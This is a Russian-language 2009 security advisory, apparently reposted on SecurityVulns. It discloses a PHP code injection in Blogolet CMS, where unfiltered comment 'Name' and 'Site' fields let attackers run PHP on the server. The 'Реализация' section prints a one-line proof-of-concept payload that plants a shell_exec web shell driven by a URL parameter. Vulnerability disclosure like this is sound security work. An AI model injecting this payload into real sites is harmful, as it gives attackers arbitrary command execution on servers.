Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1897-1] New horde3 packages fix arbitrary code execution

  [ONSEC-09-010] Undersky CMS SQL injection

  [ONSEC-09-016] Blogolet XSS

  [ONSEC-09-012] UMI.CMS Hash based Captcha

From:ONSEC
Date:28 сентября 2009 г.
Subject:[ONSEC-09-017] Blogolet PHP including

[ONSEC-09-017] Blogolet PHP including
Цель: Blogolet CMS
Тип: PHP инъекция
Угроза: Высокая
Дата обнаружения: 21.09.2009
Дата оповещения разработчика: 21.09.2009
Дата выхода исправления: 21.09.2009
Автор: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Описание: Уязвимость существует из-за отсутствия фильтрации специальных символов в поле Имя при отправке комментария. В результате, при просмотре страницы, сервер обработает php код злоумышленника. Как частный случай, возможно использование встроенной функции shell_exec() для выполнения произвольных команд ОС. Уязвимость носит критический характер.

Реализация:

На странице

http://localhost/pervaya-zapis-v-bloge/#comments

в поле "Имя" или "Сайт" введите

imya<?php echo "ONsec.ru russian security team".shell_exec($_GET["cmd"]);?>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород